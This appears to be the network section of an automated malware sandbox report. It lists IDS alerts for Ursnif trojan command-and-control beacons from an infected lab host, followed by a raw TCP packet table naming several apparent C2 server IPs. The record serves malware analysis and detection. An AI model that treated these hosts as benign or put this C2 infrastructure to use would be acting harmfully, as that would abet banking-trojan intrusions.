                  01/21/22-07:53:24.130305 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49817 | 80 | 192.168.2.3 | 198.54.117.210
                  01/21/22-07:53:24.130305 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49817 | 80 | 192.168.2.3 | 198.54.117.210
                  01/21/22-07:53:51.879244 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49847 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:51.879244 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49847 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:53.115874 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49848 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:53.129217 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49850 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:53.129217 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49850 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:53.176908 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49849 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:53.189969 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49851 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:53.189969 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49851 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:53.311358 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49854 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:53.318908 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49856 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:53.318908 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49856 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:53.377353 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49855 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:53.385300 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49857 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:53.385300 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49857 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:53.512000 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49861 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:53.512000 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49861 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:53.509435 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49858 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:53.576872 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49859 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:53.706053 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49862 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:54:16.363537 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49864 | 80 | 192.168.2.3 | 162.255.119.177
                  01/21/22-07:54:16.363537 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49864 | 80 | 192.168.2.3 | 162.255.119.177
                  01/21/22-07:54:20.027969 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49866 | 80 | 192.168.2.3 | 198.54.117.216
                  01/21/22-07:54:20.027969 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49866 | 80 | 192.168.2.3 | 198.54.117.216
                  01/21/22-07:54:20.208185 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49867 | 80 | 192.168.2.3 | 198.54.117.216
                  01/21/22-07:54:20.208185 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49867 | 80 | 192.168.2.3 | 198.54.117.216
                  01/21/22-07:54:20.530349 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49868 | 80 | 192.168.2.3 | 198.54.117.216
                  01/21/22-07:54:20.530349 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49868 | 80 | 192.168.2.3 | 198.54.117.216
                  01/21/22-07:54:20.702386 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49869 | 80 | 192.168.2.3 | 198.54.117.216
                  01/21/22-07:54:20.702386 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49869 | 80 | 192.168.2.3 | 198.54.117.216
                  01/21/22-07:54:21.035411 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49870 | 80 | 192.168.2.3 | 198.54.117.216
                  01/21/22-07:54:21.035411 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49870 | 80 | 192.168.2.3 | 198.54.117.216
                  01/21/22-07:54:21.206570 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49871 | 80 | 192.168.2.3 | 198.54.117.216
                  01/21/22-07:54:21.206570 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49871 | 80 | 192.168.2.3 | 198.54.117.216
                  01/21/22-07:54:21.547805 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49872 | 80 | 192.168.2.3 | 198.54.117.216
                  01/21/22-07:54:21.547805 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49872 | 80 | 192.168.2.3 | 198.54.117.216
                  01/21/22-07:54:21.590420 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49879 | 80 | 192.168.2.3 | 162.255.119.177
                  01/21/22-07:54:21.590420 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49879 | 80 | 192.168.2.3 | 162.255.119.177
                  01/21/22-07:54:24.476659 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49880 | 80 | 192.168.2.3 | 198.54.117.211
                  01/21/22-07:54:24.476659 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49880 | 80 | 192.168.2.3 | 198.54.117.211
                  01/21/22-07:54:44.176512 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49882 | 80 | 192.168.2.3 | 192.64.119.233
                  01/21/22-07:54:44.176512 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49882 | 80 | 192.168.2.3 | 192.64.119.233
                  01/21/22-07:54:47.258850 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49883 | 80 | 192.168.2.3 | 198.54.117.212
                  01/21/22-07:54:47.258850 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49883 | 80 | 192.168.2.3 | 198.54.117.212
                  01/21/22-07:54:47.639855 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49884 | 80 | 192.168.2.3 | 192.64.119.233
                  01/21/22-07:54:47.639855 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49884 | 80 | 192.168.2.3 | 192.64.119.233
                  01/21/22-07:54:50.027799 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49885 | 80 | 192.168.2.3 | 198.54.117.215
                  01/21/22-07:54:50.027799 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49885 | 80 | 192.168.2.3 | 198.54.117.215
                  01/21/22-07:55:07.581452 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49886 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:55:07.581452 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49886 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:55:10.371343 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49887 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:55:10.371343 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49887 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:55:18.981075 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49888 | 80 | 192.168.2.3 | 192.64.119.233
                  01/21/22-07:55:19.304621 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49889 | 80 | 192.168.2.3 | 192.64.119.233
                  01/21/22-07:55:19.340750 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49890 | 80 | 192.168.2.3 | 198.54.117.210
                  01/21/22-07:55:19.661740 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49891 | 80 | 192.168.2.3 | 198.54.117.216
                  01/21/22-07:55:39.651832 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49894 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:55:39.651832 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49894 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:55:40.062399 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49895 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:55:40.062399 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49895 | 80 | 192.168.2.3 | 31.41.46.120
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jan 21, 2022 07:53:21.753691912 CET4980480192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:21.913510084 CET8049804192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:22.050024986 CET8049798192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:22.050117016 CET4979880192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:22.071861982 CET8049802192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:22.071943045 CET4980280192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:22.084553003 CET4981180192.168.2.3198.54.117.218
                  Jan 21, 2022 07:53:22.084604025 CET4981280192.168.2.3198.54.117.218
                  Jan 21, 2022 07:53:22.109364033 CET4981380192.168.2.3198.54.117.211
                  Jan 21, 2022 07:53:22.109472990 CET4981480192.168.2.3198.54.117.211
                  Jan 21, 2022 07:53:22.247699976 CET8049811198.54.117.218192.168.2.3
                  Jan 21, 2022 07:53:22.247736931 CET8049812198.54.117.218192.168.2.3
                  Jan 21, 2022 07:53:22.247874975 CET4981180192.168.2.3198.54.117.218
                  Jan 21, 2022 07:53:22.248487949 CET4981280192.168.2.3198.54.117.218
                  Jan 21, 2022 07:53:22.248538971 CET4981280192.168.2.3198.54.117.218
                  Jan 21, 2022 07:53:22.269134045 CET8049814198.54.117.211192.168.2.3
                  Jan 21, 2022 07:53:22.269155979 CET8049813198.54.117.211192.168.2.3
                  Jan 21, 2022 07:53:22.269284010 CET4981480192.168.2.3198.54.117.211
                  Jan 21, 2022 07:53:22.269601107 CET4981380192.168.2.3198.54.117.211
                  Jan 21, 2022 07:53:22.270560026 CET4981480192.168.2.3198.54.117.211
                  Jan 21, 2022 07:53:22.411689043 CET8049812198.54.117.218192.168.2.3
                  Jan 21, 2022 07:53:22.412378073 CET8049812198.54.117.218192.168.2.3
                  Jan 21, 2022 07:53:22.430160046 CET8049814198.54.117.211192.168.2.3
                  Jan 21, 2022 07:53:22.430188894 CET8049814198.54.117.211192.168.2.3
                  Jan 21, 2022 07:53:22.431092024 CET4981380192.168.2.3198.54.117.211
                  Jan 21, 2022 07:53:22.592248917 CET8049813198.54.117.211192.168.2.3
                  Jan 21, 2022 07:53:22.592303991 CET8049813198.54.117.211192.168.2.3
                  Jan 21, 2022 07:53:22.594382048 CET4981580192.168.2.3198.54.117.211
                  Jan 21, 2022 07:53:22.594510078 CET4981680192.168.2.3198.54.117.211
                  Jan 21, 2022 07:53:22.754117012 CET8049815198.54.117.211192.168.2.3
                  Jan 21, 2022 07:53:22.754193068 CET8049816198.54.117.211192.168.2.3
                  Jan 21, 2022 07:53:22.754344940 CET4981580192.168.2.3198.54.117.211
                  Jan 21, 2022 07:53:22.754398108 CET4981680192.168.2.3198.54.117.211
                  Jan 21, 2022 07:53:22.757133961 CET4981580192.168.2.3198.54.117.211
                  Jan 21, 2022 07:53:22.916986942 CET8049815198.54.117.211192.168.2.3
                  Jan 21, 2022 07:53:22.917027950 CET8049815198.54.117.211192.168.2.3
                  Jan 21, 2022 07:53:23.559964895 CET4980080192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:23.591198921 CET4980580192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:23.719937086 CET8049800192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:23.721977949 CET4980080192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:23.919502974 CET8049801192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:23.919588089 CET4980180192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:23.926692963 CET8049804192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:23.926909924 CET4980480192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:23.954466105 CET4981780192.168.2.3198.54.117.210
                  Jan 21, 2022 07:53:23.955761909 CET4981880192.168.2.3198.54.117.210
                  Jan 21, 2022 07:53:23.962099075 CET4981980192.168.2.3198.54.117.210
                  Jan 21, 2022 07:53:23.968156099 CET4982080192.168.2.3198.54.117.210
                  Jan 21, 2022 07:53:24.118360043 CET8049817198.54.117.210192.168.2.3
                  Jan 21, 2022 07:53:24.118474007 CET4981780192.168.2.3198.54.117.210
                  Jan 21, 2022 07:53:24.119628906 CET8049818198.54.117.210192.168.2.3
                  Jan 21, 2022 07:53:24.119765997 CET4981880192.168.2.3198.54.117.210
                  Jan 21, 2022 07:53:24.125117064 CET8049819198.54.117.210192.168.2.3
                  Jan 21, 2022 07:53:24.125492096 CET4981980192.168.2.3198.54.117.210
                  Jan 21, 2022 07:53:24.126190901 CET4981980192.168.2.3198.54.117.210
                  Jan 21, 2022 07:53:24.130305052 CET4981780192.168.2.3198.54.117.210
                  Jan 21, 2022 07:53:24.131310940 CET8049820198.54.117.210192.168.2.3
                  Jan 21, 2022 07:53:24.131397963 CET4982080192.168.2.3198.54.117.210
                  Jan 21, 2022 07:53:24.289129972 CET8049819198.54.117.210192.168.2.3
                  Jan 21, 2022 07:53:24.289151907 CET8049819198.54.117.210192.168.2.3
                  Jan 21, 2022 07:53:24.293253899 CET8049817198.54.117.210192.168.2.3
                  Jan 21, 2022 07:53:24.293289900 CET8049817198.54.117.210192.168.2.3
                  Jan 21, 2022 07:53:27.050555944 CET8049798192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:27.050682068 CET4979880192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:27.071999073 CET8049802192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:27.072088957 CET4980280192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:27.407803059 CET8049811198.54.117.218192.168.2.3
                  Jan 21, 2022 07:53:27.407947063 CET4981180192.168.2.3198.54.117.218
                  Jan 21, 2022 07:53:27.594286919 CET4982180192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:27.754312038 CET8049821192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:27.756247044 CET4982180192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:27.911650896 CET8049816198.54.117.211192.168.2.3
                  Jan 21, 2022 07:53:27.913712025 CET4981680192.168.2.3198.54.117.211
                  Jan 21, 2022 07:53:28.919751883 CET8049801192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:28.919881105 CET4980180192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:28.927802086 CET8049804192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:28.927880049 CET4980480192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:29.281255960 CET8049818198.54.117.210192.168.2.3
                  Jan 21, 2022 07:53:29.281318903 CET4981880192.168.2.3198.54.117.210
                  Jan 21, 2022 07:53:29.293437004 CET8049820198.54.117.210192.168.2.3
                  Jan 21, 2022 07:53:29.293544054 CET4982080192.168.2.3198.54.117.210
                  Jan 21, 2022 07:53:31.726192951 CET4981880192.168.2.3198.54.117.210
                  Jan 21, 2022 07:53:31.726608992 CET4980180192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:31.728929996 CET4981180192.168.2.3198.54.117.218
                  Jan 21, 2022 07:53:31.729243994 CET4979880192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:31.730384111 CET4981680192.168.2.3198.54.117.211
                  Jan 21, 2022 07:53:31.730686903 CET4980280192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:31.731363058 CET4982080192.168.2.3198.54.117.210
                  Jan 21, 2022 07:53:31.731791019 CET4980480192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:31.886492014 CET8049801192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:31.889142990 CET8049798192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:31.889324903 CET8049818198.54.117.210192.168.2.3
                  Jan 21, 2022 07:53:31.890149117 CET8049816198.54.117.211192.168.2.3
                  Jan 21, 2022 07:53:31.890491962 CET8049802192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:31.891885996 CET8049804192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:31.891951084 CET8049811198.54.117.218192.168.2.3
                  Jan 21, 2022 07:53:31.895622015 CET8049820198.54.117.210192.168.2.3
                  Jan 21, 2022 07:53:32.355189085 CET4980380192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:32.855521917 CET4979980192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:33.423825979 CET4982180192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:33.596743107 CET4980080192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:51.817531109 CET4984780192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:51.817536116 CET4984680192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:51.877670050 CET804984731.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:51.878731012 CET4984780192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:51.879244089 CET4984780192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:51.881062031 CET804984631.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:51.881712914 CET4984680192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:51.939163923 CET804984731.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:51.939379930 CET804984731.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:51.939471960 CET4984780192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:51.940963984 CET4984780192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:52.000279903 CET804984731.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.054039001 CET4984880192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.055964947 CET4984980192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.068705082 CET4985080192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.068921089 CET4985180192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.097412109 CET4985280192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.097583055 CET4985380192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.114895105 CET804984831.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.114985943 CET4984880192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.115520954 CET804984931.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.115595102 CET4984980192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.115874052 CET4984880192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.128334999 CET804985031.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.128444910 CET4985080192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.129216909 CET4985080192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.131958961 CET804985131.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.132040024 CET4985180192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.157973051 CET804985331.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.158092022 CET4985380192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.158545017 CET4985380192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.160753012 CET804985231.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.160828114 CET4985280192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.175810099 CET804984831.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.175848007 CET804984831.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.175920010 CET4984880192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.176188946 CET4984880192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.176908016 CET4984980192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.188767910 CET804985031.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.188801050 CET804985031.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.188879013 CET4985080192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.189124107 CET4985080192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.189969063 CET4985180192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.218329906 CET804985331.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.218364000 CET804985331.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.218473911 CET4985380192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.218988895 CET4985380192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.236465931 CET804984831.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.236510992 CET804984931.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.236538887 CET804984931.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.236603975 CET4984980192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.246551991 CET4984980192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.247490883 CET4985480192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.248537064 CET804985031.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.253177881 CET804985131.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.253285885 CET804985131.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.253351927 CET4985180192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.256181002 CET4985180192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.257476091 CET4985680192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.258240938 CET4985780192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.268975019 CET4985580192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.278826952 CET804985331.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.306304932 CET804984931.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.310554028 CET804985431.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.310672998 CET4985480192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.311357975 CET4985480192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.317075968 CET804985631.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.317230940 CET4985680192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.318907976 CET4985680192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.319181919 CET804985131.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.321702003 CET804985731.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.321815014 CET4985780192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.332710028 CET804985531.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.332858086 CET4985580192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.376152039 CET804985431.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.376216888 CET804985431.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.376296043 CET4985480192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.376686096 CET4985480192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.377352953 CET4985580192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.378925085 CET804985631.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.379074097 CET804985631.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.379168987 CET4985680192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.379250050 CET4985680192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.385299921 CET4985780192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.438745975 CET804985631.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.439321995 CET804985431.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.440879107 CET804985531.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.440994024 CET804985531.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.441123962 CET4985580192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.441258907 CET4985580192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.443135977 CET4985880192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.444567919 CET4985980192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.448554039 CET804985731.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.448579073 CET804985731.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.448733091 CET4985780192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.448961020 CET4985780192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.451370001 CET4986080192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.451601982 CET4986180192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.508423090 CET804985531.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.508538961 CET804985831.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.508635044 CET804985931.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.508685112 CET4985880192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.508872986 CET4985980192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.509434938 CET4985880192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.511409044 CET804986131.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.511607885 CET4986180192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.511913061 CET804985731.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.512000084 CET4986180192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.512105942 CET804986031.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.512228012 CET4986080192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.571767092 CET804986131.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.571805000 CET804986131.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.571883917 CET4986180192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.572000027 CET4986180192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.573574066 CET804985831.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.573601961 CET804985831.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.573734999 CET4985880192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.575925112 CET4985880192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.576872110 CET4985980192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.631798983 CET804986131.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.640485048 CET804985831.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.641014099 CET804985931.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.641249895 CET804985931.41.46.120192.168.2.3
